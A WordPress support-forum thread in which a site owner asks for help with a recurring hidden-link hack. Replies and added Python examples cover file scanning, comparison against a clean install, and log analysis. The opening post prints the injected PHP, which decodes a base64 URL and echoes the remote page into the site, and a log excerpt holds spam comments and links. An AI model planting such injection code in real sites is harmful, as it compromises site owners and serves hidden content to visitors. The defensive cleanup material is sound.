• Resolved pgatroy

    (@pgatroy)


    I have been dealing with this for the past three weeks. I have read over 100 articles on how to fix this and still can’t figure anything out. I keep finding the following code in one of the following: header.php, index.php, and footer.php. I delete it but it always comes back. I have checked my files for the typical malicious files such as the bad image files, “wordpress” username, additional plugins in the MySQL database, etc. I can’t find anything. Any help would be greatly appreciated. Below is the code that keeps getting injected. I have also changed all passwords such as server, FTP, WordPress, MySQL, etc. There is a very good chance that I picked this up when I was still on WordPress 2.3.3.

    <?php
    // Injected snippet as posted (straight quotes restored). The base64 literal
    // decodes to http://cdt.org/search/searchdata/templates/style.htm; the remote
    // page is fetched and echoed straight into the WordPress output.
    $str1 = 'aHR0cDovL2NkdC5vcmcvc2VhcmNoL3NlYXJjaGRhdGEvdGVtcGxhdGVzL3N0eWxlLmh0bQ==';
    $content = file_get_contents(base64_decode($str1), FALSE);
    echo $content; ?>

    Thank you for your help.
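The snippet in the post has a recognisable shape: a base64 literal assigned to a variable, decoded with base64_decode(), and handed to file_get_contents() (or include/eval). The scanner below, an added example that is not from the original thread, walks a WordPress tree and reports every PHP file where that shape appears, decoding the literal so you can see what it points at. The regexes and the `/var/www/html` path are assumptions; the test input is the posted snippet itself.

```python
import base64
import re
from pathlib import Path
from typing import Optional

# Shape of the injection from the post: a base64 literal stored in a variable,
# then base64_decode()d into file_get_contents()/include/eval. A second pattern
# catches the inline form base64_decode('...'). Heuristic only: obfuscators that
# split, reverse or rot13 the string will slip past these two patterns.
B64_LITERAL = re.compile(r"""\$(\w+)\s*=\s*['"]([A-Za-z0-9+/=]{16,})['"]\s*;""")
SINK_VAR = re.compile(
    r"(file_get_contents|include|include_once|require|require_once|eval)"
    r"\s*\(\s*base64_decode\s*\(\s*\$(\w+)")
SINK_INLINE = re.compile(
    r"(file_get_contents|include|include_once|require|require_once|eval)"
    r"""\s*\(\s*base64_decode\s*\(\s*['"]([A-Za-z0-9+/=]{16,})['"]""")


def decode_b64(literal: str) -> Optional[str]:
    """Strict base64 decode; None if the literal is not valid base64 or UTF-8."""
    try:
        return base64.b64decode(literal, validate=True).decode("utf-8")
    except (ValueError, UnicodeDecodeError):
        return None


def _finding(sink: str, literal: str) -> dict:
    decoded = decode_b64(literal)
    remote = bool(decoded) and decoded.lower().startswith(("http://", "https://"))
    return {"sink": sink, "decoded": decoded, "remote": remote}


def find_injections(php_source: str) -> list:
    """One finding per base64 literal that reaches a dangerous sink."""
    literals = dict(B64_LITERAL.findall(php_source))
    findings = []
    for sink, var in SINK_VAR.findall(php_source):
        if var in literals:
            findings.append(_finding(sink, literals[var]))
    for sink, literal in SINK_INLINE.findall(php_source):
        findings.append(_finding(sink, literal))
    return findings


def scan_tree(root: Path) -> dict:
    """Relative path -> findings, for every .php file under root."""
    hits = {}
    for path in sorted(root.rglob("*.php")):
        try:
            text = path.read_text(errors="replace")
        except OSError:
            continue
        found = find_injections(text)
        if found:
            hits[path.relative_to(root).as_posix()] = found
    return hits


# The snippet from the post, used here as the sample input.
POSTED_SNIPPET = """<?php
$str1 = 'aHR0cDovL2NkdC5vcmcvc2VhcmNoL3NlYXJjaGRhdGEvdGVtcGxhdGVzL3N0eWxlLmh0bQ==';
$content=file_get_contents(base64_decode($str1),FALSE);
echo $content; ?>"""

if __name__ == "__main__":
    for hit in find_injections(POSTED_SNIPPET):
        print(hit)
    # Against a live site (document root is an assumption):
    # print(scan_tree(Path("/var/www/html")))
```

Run it over the whole document root, not just the theme: the post's experience is that header.php, index.php and footer.php are only where the payload lands, so a clean theme tells you nothing about the file that writes it back.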

Viewing 13 replies - 1 through 13 (of 13 total)
  • wp-includes/functions.php

    I should also point out that if that code is in your functions.php, removing it won't do anything, not long term at least. There are undoubtedly files on your server that can be called through a browser that will cause that code to be put back — it may be inside your wp-includes/tinymce directory (that's where it's been seen at least 2x prior).

    Thread Starter pgatroy

    (@pgatroy)

    whooami:

    Thanks so much for your reply. Can you tell me what I would be looking for in these files/folders? I scanned the functions.php file and nothing looks out of the ordinary.

    Thanks so much for your support.

    Don't ‘scan’.

    2 things to make things easier —

    Use an FTP client, and look at the timestamps on the files. Any files that have different timestamps than the rest, and aren't ones you recognize editing, ought to be scrutinized.

    Second thing: when you're checking any files, I really recommend using Beyond Compare — it's Windows software that allows you to compare the content of any 2 files and will highlight the differences for you. It can be downloaded from https://www.scootersoftware.com/

    Grab a fresh copy of whatever version of WP you're using, and have at it.
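The two checks in that reply, odd timestamps and a file-by-file comparison against a fresh download, can be done for the whole install in one pass rather than by eye. The script below is an added example, not something from the thread or from WordPress: it hashes every file in the live tree and in a pristine copy, reports core files that differ, files that exist only on the live site, and files whose modification date differs from the date most files share. `LOCAL_ONLY` (wp-config.php and .htaccess as the expected site-specific files) is an assumption, and `build_demo()` constructs placeholder trees with a stand-in dropper in the tinymce images path named later in the thread.

```python
import hashlib
import os
import tempfile
import time
from collections import Counter
from datetime import datetime
from pathlib import Path

# Files that legitimately exist only on the live site (assumption: stock install).
LOCAL_ONLY = {"wp-config.php", ".htaccess"}


def sha256_of(path: Path) -> str:
    h = hashlib.sha256()
    with path.open("rb") as f:
        for chunk in iter(lambda: f.read(1 << 16), b""):
            h.update(chunk)
    return h.hexdigest()


def tree_hashes(root: Path) -> dict:
    """Relative POSIX path -> sha256 for every file under root."""
    return {p.relative_to(root).as_posix(): sha256_of(p)
            for p in root.rglob("*") if p.is_file()}


def compare_install(install: Path, pristine: Path) -> dict:
    """Edited core files, files that should not exist at all, and missing core files.
    Themes/plugins/uploads show up under 'extra' because a core download lacks them;
    PHP under wp-content/uploads or deep inside wp-includes deserves the closest look."""
    live, clean = tree_hashes(install), tree_hashes(pristine)
    return {
        "modified": sorted(f for f in live.keys() & clean.keys() if live[f] != clean[f]),
        "extra": sorted(f for f in live.keys() - clean.keys() if f not in LOCAL_ONLY),
        "missing": sorted(clean.keys() - live.keys()),
    }


def mtime_outliers(root: Path) -> list:
    """Files whose modification date differs from the date most files share:
    the FTP-client timestamp check from the thread, automated."""
    dates = {p.relative_to(root).as_posix(): datetime.fromtimestamp(p.stat().st_mtime).date()
             for p in root.rglob("*") if p.is_file()}
    if not dates:
        return []
    common = Counter(dates.values()).most_common(1)[0][0]
    return sorted(f for f, d in dates.items() if d != common)


def build_demo() -> tuple:
    """Constructed stand-in trees: a three-file 'core' as the pristine copy, and a
    live copy with one edited core file plus one dropped file in the tinymce images
    path named in the thread. File contents are placeholders, not WordPress code."""
    base = Path(tempfile.mkdtemp())
    pristine, install = base / "pristine", base / "install"
    core = {
        "index.php": "<?php require './wp-blog-header.php';\n",
        "wp-includes/functions.php": "<?php function placeholder() {}\n",
        "wp-includes/js/tinymce/tiny_mce.js": "/* placeholder */\n",
    }
    for rel, body in core.items():
        for root in (pristine, install):
            (root / rel).parent.mkdir(parents=True, exist_ok=True)
            (root / rel).write_text(body)
    (install / "wp-config.php").write_text("<?php /* site settings */\n")
    (install / "wp-includes/functions.php").write_text(
        core["wp-includes/functions.php"] + "<?php echo 'injected'; ?>\n")
    dropper = install / "wp-includes/js/tinymce/themes/advanced/images/xp/x.php"
    dropper.parent.mkdir(parents=True, exist_ok=True)
    dropper.write_text("<?php /* constructed dropper stand-in */\n")
    # Backdate everything except the dropper to the same day 60 days ago,
    # reproducing the "one file with a different timestamp" tell.
    old = time.time() - 60 * 86400
    for p in install.rglob("*"):
        if p.is_file() and p != dropper:
            os.utime(p, (old, old))
    return install, pristine


if __name__ == "__main__":
    live, clean = build_demo()
    print(compare_install(live, clean))
    print("timestamp outliers:", mtime_outliers(live))
```

On a real site, unpack the same WordPress version you run into the pristine directory and point `compare_install()` at your document root; the timestamp check is only a hint, since an attacker who can write files can also set their mtimes.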

    Thread Starter pgatroy

    (@pgatroy)

    whooami,

    Thanks again for your help. I did exactly what you said with the above mentioned software and compared absolutely every single file/folder in the system. Everything was fine. Do you think that there is a chance this could be done through one of my many plugins that I have installed? All of my plugins are up to date.

    I am at the end of my rope and I am about ready to let go. I have spent so much time trying to figure this out and it is making me nuts!

    Thanks again for your suggestions. Any more are much appreciated. By the way, whoever comes up with a solution that works, there will be a monetary reward.

    Thanks again.

    Thread Starter pgatroy

    (@pgatroy)

    woo:

    Just installed your logger plugin. I will post after next hack. Thanks again.

    Thread Starter pgatroy

    (@pgatroy)

    I don’t think this tells me anything. I had the same injection indicated above placed into my footer this time. Here are the results during that timeframe from the logfile.

    author = play free online poker
    email = [email protected]
    url =
    comment = Lovely to see such a wonderful site. Thank you
    submit = Submit Comment
    comment_post_ID = 246
    193.227.1.25
    /wp-comments-post.php
    June 4, 2008, 9:17 am
    ————–**********——————

    wpcf_stage = process
    wpcf_your_name = Neophytos
    wpcf_email = [email protected]
    wpcf_response = None
    wpcf_website = https://relphiawhitehead.977mb.com/free55.html
    wpcf_usersubject = Submit Golf Related News
    wpcf_msg = Your site has very much liked me. I shall necessarily tell about him to the friends.
    free free
    [url=https://markarizmendi.seitenclique.net/free3098.html] free [/url] [url=https://markarizmendi.seitenclique.net/free4178.html] free [/url] [url=https://nancysamuel.yourfreehosting.net/free6909.html] free [/url] [url=https://jonathanmccracken.678host.com/free11.html] free [/url] [url=https://joshuanevitt.1122mb.com/free2963.html] free [/url]
    Submit = Submit
    201.254.56.16
    /index.php
    June 4, 2008, 9:19 am
    ————–**********——————

    It may not; the plugin captures $_POST requests, it's not a magic wand. The last hacked site I cleaned up was actually called using a simple $_GET. Besides, it's intended to be used in combination with your Apache logs, which show $_GETs.

    Even looking at $_POST and $_GET requests may not be enough. Once someone has the sort of access that allows them to modify a WP file, it's possible to code an exploit that triggers when you add a post.

    If you are still seeing injections, then you didn't go through the files well enough, or you missed some. WP consists of approx. 500 files, after all. And seriously, you ought to be replacing ALL files irrespective of not finding anything, except for wp-config.php.

    Thread Starter pgatroy

    (@pgatroy)

    Thanks Whoo. Wouldn’t the files have been replaced when I used automatic upgrade from 2.3.3 to 2.5.1?

    Thank you.

    The plugin that does the automatic upgrade?

    Unless something has changed in the way that plugin works, it does NOT replace files that might have been placed on your site previously. That's why I suggested paying very close attention to the tinymce directory —

    As an example, the most recent hacked site I describe on my site had files here:

    wp-includes/js/tinymce/themes/advanced/images/xp

    The files had been placed there prior to the upgrade. The site was upgraded, using a plugin to do the upgrade, but one simple call to a file within that directory wrote the hacks back into the core WP files that had just been replaced.

    This goes to the heart of the pitfalls of letting something else do what is so very simple and ideally ought to be done by the user.

    And by the way, the call to the main exploit file was a $_GET — the night after this site was ‘cleaned’ the exploiter came back and attempted to rerun the script, and all the different attempts and probes were seen in the site's Apache logs.
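Both of whooami's points above, that the $_POST logger misses GET-triggered droppers and that the re-run attempts showed up in the Apache logs, come down to one question: which requests asked the web server to execute a PHP file that is not a normal WordPress entry point? The example below is added here and is not from the thread or from any WordPress plugin. It parses Apache combined-format lines, flags direct requests for .php files under wp-includes/ or wp-content/uploads/ (which should never serve executable PHP) and for .php paths outside the stock entry points, and counts flagged requests per IP. The log lines are constructed with documentation IP ranges, and the entry-point list is an assumption for a stock install of that era.

```python
import re
from collections import Counter
from urllib.parse import urlsplit

# Apache "combined" LogFormat (assumption: default format, no proxy fields).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+)(?: HTTP/[\d.]+)?" (?P<status>\d{3}) (?P<size>\S+)')

# PHP files a browser legitimately requests directly on a stock install of that
# era (assumption); anything under /wp-admin/ is treated as an entry point too.
KNOWN_ENTRY = {"/", "/index.php", "/wp-login.php", "/wp-comments-post.php",
               "/xmlrpc.php", "/wp-cron.php", "/wp-trackback.php", "/wp-mail.php"}
# Directories that should never serve executable PHP to a browser.
NEVER_PHP = ("/wp-includes/", "/wp-content/uploads/")


def parse_line(line: str):
    """Dict of fields for one combined-format line, or None if it does not parse."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["path"] = urlsplit(rec["target"]).path   # drop the query string
    return rec


def classify(path: str):
    """Why a direct request for this path is suspicious, or None if it is not."""
    if not path.lower().endswith(".php"):
        return None
    for prefix in NEVER_PHP:
        if path.startswith(prefix):
            return "php served from " + prefix
    if path in KNOWN_ENTRY or path.startswith("/wp-admin/"):
        return None
    return "php outside known entry points"


def suspicious_requests(lines) -> list:
    """Flagged records, any method and any status: a 404 still shows probing."""
    flagged = []
    for line in lines:
        rec = parse_line(line)
        if rec is None:
            continue
        reason = classify(rec["path"])
        if reason:
            flagged.append({"ip": rec["ip"], "method": rec["method"], "path": rec["path"],
                            "status": rec["status"], "reason": reason})
    return flagged


def probing_ips(flagged) -> Counter:
    """How many flagged requests each client made; repeat offenders stand out."""
    return Counter(r["ip"] for r in flagged)


# Constructed sample lines (documentation IP ranges); not from the poster's server.
SAMPLE_LOG = """\
203.0.113.5 - - [04/Jun/2008:09:15:02 -0500] "GET /wp-includes/js/tinymce/themes/advanced/images/xp/x.php?a=1 HTTP/1.1" 200 512 "-" "Mozilla/4.0"
198.51.100.7 - - [04/Jun/2008:09:16:11 -0500] "GET /index.php HTTP/1.1" 200 8192 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jun/2008:09:17:20 -0500] "POST /wp-comments-post.php HTTP/1.1" 302 0 "-" "Mozilla/4.0"
203.0.113.5 - - [04/Jun/2008:09:18:33 -0500] "GET /wp-content/uploads/2008/06/img.php HTTP/1.1" 404 210 "-" "Mozilla/4.0"
198.51.100.7 - - [04/Jun/2008:09:19:40 -0500] "GET /wp-includes/js/tinymce/tiny_mce.js HTTP/1.1" 200 30000 "-" "Mozilla/5.0"
203.0.113.5 - - [04/Jun/2008:09:20:01 -0500] "GET /wp-content/plugins/example/run.php HTTP/1.1" 200 44 "-" "Mozilla/4.0"
""".splitlines()

if __name__ == "__main__":
    hits = suspicious_requests(SAMPLE_LOG)
    for h in hits:
        print(h)
    print(probing_ips(hits))
```

The "php outside known entry points" category will include legitimate plugin files that are built to be requested directly, so triage those by hand; a 200 for a .php file under wp-includes/js/ or wp-content/uploads/ needs no triage, that file should not exist.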

    Thread Starter pgatroy

    (@pgatroy)

    Whoo,

    Thanks so much for your help and insight. What a pain in the A$$!!! I have learned my lesson to upgrade to the new versions as soon as they come out. I am going to do a complete fresh install, change my passwords and I will see what happens. When doing a clean install, I am assuming that I need to delete the wp-admin, wp-includes completely and then keep the config file, themes, uploads, etc. From what you say above, I need to delete as much as possible from what I have on the server.

    Any help on this would be greatly appreciated as well. Again, thanks so much for your help.

    Thread Starter pgatroy

    (@pgatroy)

    Just wanted to let those of you know who are having problems with this that I did a fresh install of wordpress (deleting as much as possible in regards to wp-folders and files and then re-uploading current version). So far, 12 hours later, still good to go. I am keeping my fingers crossed.

    I would even shitcan the theme files, if you can get away with it — download fresh copies, and put those up.

    The end goal is to make sure that all the files are clean, and since its a tedious task (for most) to look through all the files, deleting and replacing as many as you possibly can simplifies that process.

    Ideally, you ought to only have to physically scrutinize your wp-config.php and any server-related files (.htaccess).

    It's never a sure thing, but it's very good advice.

  • The topic ‘Hidden Link Hack, Cannot Figure Out’ is closed to new replies.